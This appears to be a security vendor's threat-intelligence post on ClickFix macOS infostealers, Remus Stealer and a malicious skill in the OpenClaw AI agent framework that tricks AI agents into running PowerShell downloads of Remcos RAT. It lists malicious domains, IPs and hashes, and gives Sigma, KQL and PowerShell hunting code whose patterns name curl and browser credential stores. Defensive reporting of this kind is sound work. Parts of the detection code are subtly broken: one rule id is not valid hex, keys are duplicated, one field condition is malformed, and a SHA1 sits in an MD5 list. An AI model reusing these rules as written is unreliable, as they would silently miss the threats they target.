Threat Summary
Recent OTX pulses indicate a convergence of high-evasion credential theft and novel delivery vectors targeting both Windows and macOS ecosystems. The intelligence highlights three distinct but technically sophisticated campaigns:
- ClickFix macOS Campaign: A resurgence of social engineering tactics where threat actors host malicious Terminal commands on blog platforms, disguised as troubleshooting for fake macOS utilities. This delivers infostealers like Macsync, Shub Stealer, and AMOS.
- Remus Stealer Evolution: An advanced evolution of the Lumma Stealer, emerging after alleged Lumma core members were doxxed in late 2025. Remus specifically bypasses Application-Bound Encryption (ABE) in browsers and utilizes Ethereum blockchain transactions for C2 communication (Etherhiding).
- Weaponized AI Frameworks: The weaponization of the OpenClaw AI agent framework via a malicious "DeepSeek-Claw" skill. This campaign delivers Remcos RAT and GhostLoader by tricking AI agents/developers into executing PowerShell commands that download malicious MSI packages, leveraging signed GoToMeeting binaries for sideloading.
Collective Objective: Credential harvesting (browser cookies, crypto wallets), persistent remote access (RAT), and data exfiltration via non-standard C2 channels (blockchain).
Threat Actor / Malware Profile
Remus Stealer (Lumma Successor)
- Type: 64-bit Information Stealer.
- Origin: Evolved from Lumma Stealer following the doxxing of Lumma developers (Aug-Oct 2025).
- Distribution: Initial access patterns suggest similar payload delivery to its predecessor, likely via cracked software or fake updates.
- Behavior:
- ABE Bypass: Capable of bypassing Chrome/Edge Application-Bound Encryption to steal cookies and sessions.
- C2 Innovation: Uses the Ethereum blockchain for C2 communication (storing commands in transaction data fields), a technique known as Etherhiding.
- Payload: Steals cryptocurrency wallet data, browser credentials, and system information.
ClickFix macOS Campaign
- Malware Families: Macsync, Shub Stealer, AMOS, PhantomPulse.
- Distribution: "ClickFix" style social engineering. Victims are lured to blog posts or content platforms offering fake macOS utilities or troubleshooting steps.
- Execution: Victims are coerced into copying and pasting malicious AppleScript or Bash commands into the Terminal.
- Objective: Exfiltration of iCloud Keychain data, browser passwords, and specific macOS system files.
Remcos RAT & GhostLoader
- Distribution: Malicious "DeepSeek-Claw" skill within the OpenClaw AI framework.
- Payload Behavior:
- GhostLoader: A sophisticated shellcode loader designed to obfuscate the payload in memory.
- Remcos RAT: A full-featured Remote Access Trojan allowing surveillance, keylogging, and command execution.
- Persistence: Uses PowerShell to download an MSI. The MSI contains a legitimate, signed GoToMeeting executable used to DLL sideload the malicious payload (Remcos).
IOC Analysis
The provided indicators reveal a cross-platform infrastructure:
- Domains (C2/Phishing): Primarily associated with the ClickFix and OpenClaw campaigns (e.g.,
jihiz.com,dropras.xyz). These domains likely host the malicious payloads or the fake troubleshooting blogs. - IPv4 Addresses: A block of IPs (
217.156.122.x) associated with the Remus Stealer infrastructure suggests a dedicated hosting setup, possibly bulletproof hosting, resistant to takedown. - File Hashes (MD5/SHA1): Specific hashes provided for the OpenClaw/Remcos MSI and payload files. These are critical for EDR detection and retrospective hunting.
Operational Guidance:
- SOC Teams: Immediately block the listed domains and IP ranges at the perimeter/firewall.
- EDR: Load the provided MD5/SHA1 hashes into custom detection rules. Look for unsigned binaries attempting to interact with the
217.156.122.0/24subnet. - Threat Intel: The domains
malext.comandmiappl.comexhibit naming patterns consistent with "malvertising" or "fake app" distribution networks often seen in initial access brokers.
Detection Engineering
The following detection logic targets the specific behaviors identified in the OTX pulses: PowerShell-based delivery (Remcos), MacOS Terminal abuse (ClickFix), and browser credential theft patterns (Remus).
YAML
title: Potential Remcos RAT via PowerShell MSI Download and Sideload
id: 4c8f1d2e-6a3b-4f5c-9e1d-8a2b3c4d5e6f
description: Detects PowerShell commands downloading MSI files associated with Remcos/GhostLoader delivery, followed by execution of signed binaries often used for sideloading like GoToMeeting.
status: experimental
date: 2026/05/09
author: Security Arsenal
references:
- https://otx.alienvault.com/pulse/663b8a1c8f9b1c0a1b2c3d4e
tags:
- attack.execution
- attack.t1059.001
- attack.s0129
logsource:
category: process_creation
product: windows
detection:
selection_download:
Image|endswith: '\powershell.exe'
CommandLine|contains: 'Invoke-WebRequest'
CommandLine|contains: '.msi'
selection_indicators:
CommandLine|contains:
- 'dropras.xyz'
- 'trackpipe.dev'
selection_sideload:
Image|endswith:
- '\g2mstart.exe'
- '\g2mcomm.exe'
- '\g2mlauncher.exe'
CommandLine|contains: 'msiexec'
condition: 1 of selection_*
falsepositives:
- Legitimate GoToMeeting installation (rare via PowerShell)
level: high
---
title: macOS ClickFix Fake Utility Execution Pattern
id: 5d9e2f3a-7b4c-0e6d-1f2a-3b4c5d6e7f8a
description: Detects execution of suspicious bash/osascript commands often used in ClickFix campaigns to download payloads from domains resembling ad-tech or utilities.
status: experimental
date: 2026/05/09
author: Security Arsenal
references:
- https://otx.alienvault.com/pulse/663b8a1c8f9b1c0a1b2c3d4f
tags:
- attack.execution
- attack.t1059.004
logsource:
category: process_creation
product: macos
detection:
selection_shell:
Image|endswith:
- '/bin/bash'
- '/bin/sh'
- '/usr/bin/osascript'
selection_indicators:
CommandLine|contains:
- 'jihiz.com'
- 'kayeart.com'
- 'bintail.com'
- 'malext.com'
selection_curl:
CommandLine|contains: 'curl'
condition: selection_shell and (selection_indicators or selection_curl)
falsepositives:
- Legitimate software updates via terminal
level: high
---
title: Remus Stealer Browser Encryption Bypass Activity
id: 6e0f3g4h-8i5j-1f7g-2h3i-4j5k6l7m8n9o
description: Detects processes accessing browser user data directories suspiciously, indicative of Remus/Lumma stealer behavior attempting to bypass application-bound encryption.
status: experimental
date: 2026/05/09
author: Security Arsenal
references:
- https://otx.alienvault.com/pulse/663b8a1c8f9b1c0a1b2c3d50
tags:
- attack.credential_access
- attack.t1555.003
logsource:
category: process_access
product: windows
detection:
selection_target:
TargetImage|contains:
- '\Google\Chrome\User Data\'
- '\Microsoft\Edge\User Data\'
- '\BraveSoftware\Brave-Browser\User Data\'
selection_granted_access:
GrantedAccess contains:
- '0x1010'
- '0x1410'
- '0x143a'
exclusion_image:
SourceImage|endswith:
- '\chrome.exe'
- '\msedge.exe'
- '\brave.exe'
condition: selection_target and selection_granted_access and not exclusion_image
falsepositives:
- Legitimate password managers or browser extensions
level: medium
kql
// Hunt for Remcos/ClickFix Network Indicators
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl in (
'jihiz.com', 'kayeart.com', 'bintail.com', 'wusetail.com', 'malext.com',
'miappl.com', 'pla7ina.cfd', 'dropras.xyz', 'trackpipe.dev'
) or
RemoteIP in (
'45.94.47.204', '217.156.122.57', '217.156.122.75',
'217.156.122.12', '45.151.106.110'
)
| project Timestamp, DeviceName, InitiatingProcessFileName, InitiatingProcessCommandLine, RemoteUrl, RemoteIP, RemotePort
| extend IOCHit = "Remcos_ClickFix_Pulse"
powershell
# IOC Hunt Script for Remcos / GhostLoader Hashes
$targetHashes = @(
"1c267cab0a800a7b2d598bc1b112d5ce",
"2a5f619c966ef79f4586a433e3d5e7ba",
"2c4b7c8b48e6b4e5f3e8854f2abfedb5",
"82536825e700f4c863238a90dd314687",
"cc1af839a956c8e2bf8e721f5d3b7373",
"470c3803bd5a4770eb5470a84a831f187f591c64"
)
Write-Host "[+] Hunting for Remcos/GhostLoader file artifacts..." -ForegroundColor Cyan
# Scan C: drive for specific hashes (Limited depth for performance)
Get-ChildItem -Path C:\ -Recurse -Include *.exe,*.msi,*.dll,*.bin -ErrorAction SilentlyContinue |
ForEach-Object {
$hash = (Get-FileHash -Path $_.FullName -Algorithm MD5 -ErrorAction SilentlyContinue).Hash
if ($targetHashes -contains $hash) {
Write-Host "[!] MALICIOUS FILE FOUND: $($_.FullName)" -ForegroundColor Red
}
}
# Check DNS Cache for C2 Domains
$domains = @("dropras.xyz", "trackpipe.dev", "malext.com", "jihiz.com")
Write-Host "[+] Checking DNS Cache for ClickFix/Remcos C2 domains..." -ForegroundColor Cyan
Get-DnsClientCache |
Where-Object { $domains -contains $_.Entry } |
Select-Object Entry, Data, TimeToLive |
Format-Table -AutoSize
Response Priorities
- Immediate: Block all listed domains and IP ranges on perimeter firewalls and secure web gateways. Quarantine any endpoints matching the provided file hashes.
- 24h: Initiate credential theft investigation. Since Remus and AMOS target browser cookies and wallets, force a password reset for high-privilege accounts and rotate cryptocurrency wallet seeds for exposed development machines.
- 1 Week: Review and restrict the use of AI agent frameworks (like OpenClaw) in development environments. Implement strict application whitelisting for PowerShell execution and MSI installation packages. Update macOS policies to restrict Terminal execution for non-admin users to mitigate ClickFix.
Related Resources
Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub
darkwebotx-pulsedarkweb-malwareremus-stealerclickfixremcos-ratghostloaderinfostealer
Is your security operations ready?
Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.